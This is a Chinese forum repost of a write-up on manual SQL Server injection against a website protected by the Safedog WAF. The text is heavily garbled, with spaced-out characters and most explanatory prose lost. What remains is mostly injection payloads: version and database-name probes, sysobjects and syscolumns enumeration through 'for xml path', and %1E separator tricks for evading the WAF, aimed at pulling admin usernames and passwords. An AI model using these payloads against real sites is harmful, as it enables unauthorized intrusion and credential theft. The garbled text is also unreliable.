搜索

[18951] 2020-12-01_记一次手工SQLServer注入bypass安全狗

文档创建者:s7ckTeam
浏览次数:18
最后更新:2025-01-18
2020-12-01_记一次手工SQLServer注入bypass安全狗 S Q L S e r v e r   b y p a s s   I D L a b   2 0 2 0 - 1 2 - 0 1                                                                                         - -                                                                                                       s r c w a f h t t p s : / / w w w . x x o o . c o m / I P c m s C h r o m e
f o f a u r l h t t p : / / m . x x o o . c o m 访 u r l 4 0 4
I D s q l ~ ~ s q l m a p I P b a n
a n d   1 = 1 a n d   1 = 2 使 i d = 1 e 0 i d = 1 e 5 m y s q l a n d   . 1 = . 1 a n d   . 1 = . 2
, + % 2 0 f u z z s e l e c t a n d + 1 = ( @ @ v e r s i o n ) - - a
a n d + 1 = ( s e l e c t   d b _ n a m e ( ) ) - - a a n d + 1 = ( d b _ n a m e ( ) ) - - a d b _ n a m e ( 1 ) m a s t e r i x i n w e i x w m s s q l i l a b s a n d   1 = ( s e l e c t   t o p   1   n a m e   f r o m   m s s q l i l a b s . . s y s o b j e c t s   w h e r e   x t y p e = ' U ' ) - -   a m s s q l i l a b s a n d   1 = ( ( s e l e c t   n a m e , % 2 7 | | % 2 7   f r o m   m s s q l i l a b s . . s y s o b j e c t s   w h e r e   x t y p e = ' U '   f o r   x m l   p a t h ( ' ' ) ) ) - -   a
f u z z % 1 E m s s q l % 1 E i x i n w e i x w i x i n w e i x w a n d   1 = ( s e l e c t   n a m e , ' | | '   f r o m   m s s q l i l a b s . . s y s c o l u m n s   w h e r e   i d = ( s e l e c t   t o p   1   i d   f r o m   m s s q l i l a b s . . s y s o b j e c t s   w h e r e   x t y p e = ' U '   ) f o r   x m l   p a t h ( ' ' ) ) - -   a m s s q l i l a b s
i x i n w e i x w a d m i n l o g i n % 2 0 % 1 E u s e r n a m e , p a s s w o r d s q l m a p t a m p e r m y s s q l % 1 E % 1 a % 1 b % 1 c % 1 d w a f
w h o i s d d

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理